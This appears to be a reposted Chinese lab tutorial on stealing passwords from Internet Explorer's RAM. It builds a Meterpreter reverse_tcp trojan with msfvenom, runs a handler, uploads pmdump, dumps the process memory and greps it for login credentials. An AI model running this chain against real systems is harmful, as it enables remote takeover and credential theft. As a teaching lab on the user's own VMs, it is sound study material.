使用Metasploit从RAM中窃取密码
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了使用Metasploit从RAM中窃取密码,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含2209字,纯文字阅读大概需要4分钟。
内容图文
你需要什么
- Windows 2008 Server虚拟机(任何其他Windows版本也应该没问题,但它不能运行防病毒软件)
- Kali 2虚拟机
目的
使用meterpreter命令,我们会将Internet Explorer的内存转储到文件中,下载并从中窃取密码。
已经有各种Metasploit脚本来自动化这个过程,但是在Metasploit更改使它们停止工作之前它们不能工作很久,所以我建议使用这个手动过程
在你的Kali机器上启动Apache
在您的Kali 2计算机的终端窗口中,执行以下命令:
ifconfig
service apache2 restart
登录Gmail
在Windows计算机上,在Internet Explorer中,打开163.com 并尝试使用这些凭据登录.
- yourname
- yourpassword
单击“ 登录 ”按钮。163不会让您进入,但这对我们的目的无关紧要。这个项目的重点是Internet Explorer将您的凭据放入RAM
创建特洛伊木马
在Kali计算机的终端窗口中,执行这些命令,将IP地址替换为Kali计算机的IP地址。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.58.129 -f exe > fun.exe
cp fun.exe /var/www/html
下载pmdump
我们将使用一个非常古老的工具 - pmdump,从2002年开始。它仍然可以使用!
下完以后,在您的Kali 2计算机的终端窗口中,执行以下命令:
file pmdump.exe
cp pmdump.exe /tmp
启动Meterpreter处理程序
在Kali 2计算机的终端窗口中,执行这些命令,将IP地址替换为Kali计算机的IP地址。
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.58.129
exploit
下载并执行恶意可执行文件
在Windows目标计算机上的Web浏览器中,输入此URL,将IP地址替换为Kali计算机的IP地址。
http://192.168.58.129/fun.exe
运行该文件,如下所示。
将pmdump上传到目标
在您的Kali机器上,应打开Meterpreter会话,如下所示。
在meterpreter提示符下,执行以下命令:
cd %TEMP%
pwd
upload /tmp/pmdump.exe %TEMP%
在meterpreter提示符下,执行以下命令:
shell
dir
您应该看到pmdump.exe文件,如下所示。
执行这些命令以查看pmdump的工作方式,并列出目标系统上的进程。
pmdump.exe
pmdump.exe -list
在列表中找到“iexplore.exe”,并注意其进程ID号,如下所示。
执行这些命令,将“1744”替换为正确的进程ID“iexplore.exe”:
pmdump.exe 1744?ie.mem
dir
如下所示,Internet Explorer使用的RAM现在位于名为ie.mem的文件中。此文件大小约为146 MB。
执行这些命令返回Meterpreter shell并开始下载“ie.mem”文件:
exit
download ie.mem /tmp
按Ctrl + C退出msf
执行此命令以在RAM文件中搜索登录凭据:
strings /tmp/ie.mem | grep "163"
您的用户名和密码应该很容易找到。突出显示它们,如下所示:
内容总结
以上是互联网集市为您收集整理的使用Metasploit从RAM中窃取密码全部内容,希望文章能够帮你解决使用Metasploit从RAM中窃取密码所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。